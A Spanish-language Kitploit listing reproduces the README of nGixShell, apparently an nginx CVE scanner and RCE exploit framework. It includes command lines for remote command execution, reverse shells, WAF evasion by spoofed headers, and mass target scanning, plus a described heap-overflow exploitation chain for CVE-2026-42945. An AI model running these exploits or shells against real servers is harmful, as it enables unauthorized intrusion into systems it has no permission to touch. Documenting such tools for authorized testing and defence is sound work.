Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
nGixshell — escáner de CVE nginx + framework de exploits RCE (CVE-2026-42945 + 16 otros) | Kitploit
Herramientas/GitHubGitHub/mateusverass/ngixshell
ReconocimientoEscáneres de VulnerabilidadesFrameworks de ExploitsExplotación de Aplicaciones WebEvasión de WAFSeguridad WebPruebas de PenetraciónComando y ControlEnumeración de SubdominiosRed TeamingDesarrollo de Payloads
218hace 3 mesesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
GitHub
mateusverass/ngixshell

nGixshell

escáner de CVE nginx + framework de exploits RCE (CVE-2026-42945 + 16 otros)

Ver Repositorio
Compartir
nGixShell

Python CVEs Zero deps License


nGixShell es un escáner de CVE de nginx y un framework de explotación RCE. Incluye una prueba de concepto funcional para CVE-2026-42945 — un desbordamiento crítico de heap buffer en ngx_http_rewrite_module — y un escáner que cubre 53 CVEs de nginx con sondas HTTP automatizadas, huella digital, detección/evasión de WAF, auditoría de seguridad web y generación de informes.

Cero dependencias externas. Solo stdlib de Python 3.


Inicio rápido

root@kitploit:~
# Spin up the vulnerable lab
docker compose -f env/docker-compose.yml up -d

# Auto mode — fingerprint + CVE scan + web audit
python3 ngixshell.py 127.0.0.1:19321

# Execute a command via RCE (CVE-2026-42945)
python3 ngixshell.py 127.0.0.1:19321 --cmd 'id'

# Drop a reverse shell (IP auto-detected)
python3 ngixshell.py 127.0.0.1:19321 --shell --shell-type bash --upgrade-shell

# Detect and bypass WAF, then scan
python3 ngixshell.py 127.0.0.1:19321 --waf-bypass

# Subdomain scan
python3 ngixshell.py --subdomain-scan example.com --scan-port 443

# Multiple targets from a file
python3 ngixshell.py --target-file hosts.txt --json --html-report results.html

Sin necesidad de indicar opciones — apuntar la herramienta a un objetivo ejecuta todo automáticamente. TLS se detecta automáticamente. nginx se identifica incluso con server_tokens off.


Uso

root@kitploit:~
python3 ngixshell.py [TARGET] [OPTIONS]

Formato de TARGET:
  127.0.0.1
  192.168.1.10:8080
  http://192.168.1.10:8080
  https://target.local

Modos

Detección y Evasión de WAF

FlagDescripción
--waf-detectDetecta WAF antes de escanear
--waf-bypassActiva todas las técnicas de evasión (también ejecuta detección)
--waf-ip IPSuplanta esta IP en cabeceras de evasión (por defecto: RFC1918 aleatoria)

Técnicas de evasión (todas activas cuando se establece --waf-bypass):

WAF detectados: Cloudflare, AWS WAF, Akamai, Imperva/Incapsula, ModSecurity, F5 BIG-IP ASM, Sucuri, Barracuda, NAXSI, Fastly, Wordfence

Auditoría Web

Se ejecuta automáticamente en modo escaneo. Todos los módulos pueden omitirse individualmente.

  • Auditoría de cabeceras — HSTS, CSP, X-Frame-Options, X-Content-Type-Options, Referrer-Policy, Permissions-Policy, cabeceras que filtran la versión
  • Descubrimiento de rutas — 50+ rutas; sonda centinela elimina falsos positivos de reglas catch-all 403/301
  • Enumeración de hosts virtuales — requiere diferencia de estado Y cuerpo para evitar falsos positivos de bloqueo por defecto
  • Auditoría TLS — prueba soporte TLS 1.0–1.3, caducidad de certificados y detección de autofirmados
  • stub_status — analiza métricas de conexión activa desde /nginx_status si está expuesto

Conexión

FlagDescripción
--port PORTSobrescribe el puerto
--tls

HTTP

FlagDescripción
--user-agent UAUser-Agent personalizado
--auth USER:PASSAutenticación básica HTTP

Tasa / Temporización

FlagDescripción
--rate-limit RPSMáximo de peticiones por segundo
--jitter MS

Salida

FlagDescripción

Cobertura de CVE

53 entradas que abarcan de 2009 a 2026. Ordenadas por CVSS.


El Bug (CVE-2026-42945)

El motor de scripts de reescritura de nginx utiliza un modelo de dos pasos: calcular el tamaño del búfer, luego copiar. El flag is_args se establece en el motor principal cuando una sustitución de rewrite contiene ?, pero el paso de cálculo de longitud se ejecuta sobre un sub-motor recién puesto a cero:

  • Paso de longitud — ve is_args = 0 → devuelve la longitud bruta de la captura
  • Paso de copia — ve is_args = 1 → llama a ngx_escape_uri(NGX_ESCAPE_ARGS), expandiendo cada byte no seguro a 3 bytes

La copia desborda el búfer heap de tamaño insuficiente con datos URI controlados por el atacante. La explotación corrompe un puntero de limpieza ngx_pool_t adyacente mediante feng shui de heap entre peticiones, redirigiéndolo a un ngx_pool_cleanup_s falso que llama a system() al destruir el pool.

Versiones Afectadas

ProductoVulnerableCorregida
NGINX Open Source0.6.27 – 1.30.01.31.0, 1.30.1
NGINX PlusR32 – R36R36 P4, R35 P2, R32 P6

Aviso del fabricante: https://my.f5.com/manage/s/article/K000160932


Configuración del Laboratorio

Probado en Ubuntu 24.04 LTS. Requiere Docker y Python 3.8+.

root@kitploit:~
# Iniciar el laboratorio vulnerable (nginx 1.25.3)
docker compose -f env/docker-compose.yml up -d

# Escaneo completo
python3 ngixshell.py 127.0.0.1:19321

# RCE con salida JSON
python3 ngixshell.py 127.0.0.1:19321 --cmd 'id' --json

# Reverse shell — payload bash, actualización automática de PTY
python3 ngixshell.py 127.0.0.1:19321 --shell --shell-type bash --upgrade-shell

# Escaneo con evasión de WAF e IP suplantada
python3 ngixshell.py 127.0.0.1:19321 --waf-bypass --waf-ip 10.10.10.1

# A través de proxy SOCKS5
python3 ngixshell.py 192.168.1.10 --proxy socks5://127.0.0.1:9050

# Escaneo de subdominios con limitación de tasa
python3 ngixshell.py --subdomain-scan example.com --scan-port 443 --rate-limit 10

# Múltiples objetivos, salida JSON, informe HTML
python3 ngixshell.py --target-file hosts.txt --json --html-report results.html

Aviso Legal

Solo para pruebas de seguridad autorizadas, competiciones CTF e investigación.

Descargar herramienta
FlagDescripción
(ninguno)Auto — huella digital + escaneo de CVE + auditoría web
--cmd 'CMD'Ejecuta un comando mediante CVE-2026-42945 RCE
--cmd-file FILEEjecuta comandos desde un archivo (unidos con ;)
--shellAbre una reverse shell
--shell-type TYPEPayload: bash python perl php nc powershell (por defecto: python)
--upgrade-shellEnvía automáticamente la actualización de PTY tras conectar la shell
--subdomain-scan DOMAINBusca nginx vulnerable en subdominios
--cve CVE-IDPrueba un CVE específico
--list-cvesMuestra los 53 CVEs con CVSS e información de sonda
--list-candidatesMuestra candidatos de direcciones de heap
--dry-runSolo huella digital + escaneo, sin explotación
--target-file FILEEscanea múltiples hosts desde un archivo
TécnicaDetalle
Suplantación de IPX-Forwarded-For, X-Real-IP, X-Originating-IP, True-Client-IP, X-Remote-IP, X-Client-IP
Rotación de UA11 User-Agents reales de navegadores/bots, aleatorizados por petición
Ofuscación de rutadoble barra, relleno /./, codificación porcentual, variación de mayúsculas
Barajado de mayúsculas en cabecerasAleatoriza el uso de mayúsculas en nombres de cabecera para romper la coincidencia de patrones del WAF
FlagDescripción
--skip-headersOmite la auditoría de cabeceras de seguridad HTTP
--skip-pathsOmite el descubrimiento de rutas/archivos
--skip-vhostsOmite la enumeración de hosts virtuales
--skip-tlsOmite la auditoría del protocolo TLS
--path-wordlist FILERutas adicionales a probar (una por línea)
Fuerza TLS (por defecto se detecta automáticamente)
--proxy URLProxy: http://, https://, socks5://
--cookie VALUE
Cabecera Cookie
--header NAME:VALUECabecera adicional (repetible)
Retardo aleatorio de 0–MS ms entre peticiones
--retry NReintentar sondas no concluyentes (por defecto: 1)
--timeout-multiplier XEscalar todos los tiempos de espera (por defecto: 1.0)
--output FILE
Escribe el registro en FILE
--jsonImprime resumen JSON al final
--html-report [FILE]Genera informe HTML (por defecto: ngixshell_<host>_<ts>.html)
--verboseSalida de depuración
CVECVSSComponenteDescripción
CVE-2026-429459.8 CRITICALrewriteDesbordamiento de heap → RCE (explotado)
CVE-2026-429468.1 HIGHrewriteCorrupción de memoria (mismo aviso)
CVE-2022-417417.8 HIGHmp4Corrupción de memoria mediante mp4 malicioso
CVE-2016-12477.8 HIGHpackagingEscalada de privilegios por enlace simbólico en archivo de log
CVE-2021-230177.7 HIGHresolverSobrescritura de heap off-by-one
CVE-2026-407017.5 HIGHrequestCorrupción de memoria en el procesamiento de peticiones
CVE-2026-429347.5 HIGHrequestCorrupción de memoria (mismo aviso)
CVE-2026-277847.5 HIGHmp4Desbordamiento de búfer mediante mp4 manipulado
CVE-2026-326477.5 HIGHmp4Desbordamiento de búfer (hermano del anterior)
CVE-2024-249907.5 HIGHHTTP/3Use-after-free en el módulo QUIC
CVE-2024-249897.5 HIGHHTTP/3Desreferencia de puntero NULL en QUIC
CVE-2024-310797.5 HIGHHTTP/3Desbordamiento de pila en el codificador QUIC
CVE-2024-327607.5 HIGHHTTP/3Sobrescritura de búfer mediante trama HEADERS
CVE-2022-417427.5 HIGHmp4Revelación de memoria heap
CVE-2017-75297.5 HIGHrange filterDesbordamiento de enteros → lectura fuera de límites
CVE-2016-07467.5 HIGHresolverUse-after-free mediante respuesta DNS manipulada
CVE-2014-01337.5 HIGHSPDYDesbordamiento de heap en la implementación SPDY
CVE-2014-00887.5 HIGHSPDYCorrupción de memoria en SPDY
CVE-2013-45477.5 HIGHcoreBypass de URI con espacio+NUL
CVE-2013-20287.5 HIGHcoreDesbordamiento de pila en codificación chunked
CVE-2012-11807.5 HIGHproxyUse-after-free en el módulo proxy
CVE-2009-35557.5 HIGHSSLInyección de renegociación TLS (MITM)
CVE-2009-26297.5 HIGHcoreSubdesbordamiento de búfer en el análisis de URI
CVE-2026-429266.5 MEDIUMHTTP/2División de peticiones mediante proxy
CVE-2026-276546.5 MEDIUMWebDAVDesbordamiento de heap en el módulo DAV
CVE-2026-287536.5 MEDIUMmailInyección de cabeceras en el proxy de correo
CVE-2026-16426.5 MEDIUMproxyFuga de reutilización de sesión SSL upstream
CVE-2019-95116.5 MEDIUMHTTP/2Data Dribble DoS de CPU/memoria
CVE-2012-20896.8 MEDIUMmp4Desbordamiento de búfer mediante petición mp4
CVE-2018-168455.5 MEDIUMmp4Subdesbordamiento de enteros → caída + revelación
CVE-2019-203725.3 MEDIUMproxyContrabando de peticiones HTTP
CVE-2026-404605.3 MEDIUMHTTP/3Suplantación de conexión QUIC
CVE-2026-287555.3 MEDIUMSSLRevelación de memoria en procesamiento OCSP
CVE-2025-234195.3 MEDIUMSSLBypass de certificado en reanudación de sesión TLS
CVE-2024-352005.3 MEDIUMHTTP/3Desreferencia de puntero NULL
CVE-2024-341615.3 MEDIUMHTTP/3Revelación de memoria
CVE-2016-44505.3 MEDIUMcorePuntero NULL mediante cuerpo de petición chunked
CVE-2016-07425.0 MEDIUMresolverPuntero inválido mediante paquete UDP manipulado
CVE-2016-07475.0 MEDIUMresolverLímite insuficiente de resolución CNAME
CVE-2014-35565.0 MEDIUMmailInyección de comandos STARTTLS
CVE-2013-20705.3 MEDIUMproxyRevelación de respuesta del backend
CVE-2011-49635.0 MEDIUMaccessBypass de control de acceso por literal IPv6
CVE-2011-43155.0 MEDIUMresolverDesbordamiento de heap mediante respuesta DNS manipulada
CVE-2009-38965.0 MEDIUMcoreDoS por desreferencia de puntero NULL
CVE-2025-538594.3 MEDIUMmailInyección de comandos SMTP
CVE-2014-36164.3 MEDIUMSSLConfusión de host virtual por SNI TLS
CVE-2026-276514.3 MEDIUMmailDesreferencia de puntero NULL en proxy de correo
CVE-2019-95134.3 MEDIUMHTTP/2Resource Loop DoS de CPU
CVE-2019-95164.3 MEDIUMHTTP/2Agotamiento de memoria por cabeceras de 0 longitud
CVE-2018-168434.3 MEDIUMHTTP/2Consumo excesivo de memoria
CVE-2018-168444.3 MEDIUMHTTP/2CPU excesiva mediante tramas SETTINGS
CVE-2024-73474.7 MEDIUMmp4Lectura fuera de límites
CVE-2009-38984.9 MEDIUMWebDAVSalto de directorio mediante COPY/MOVE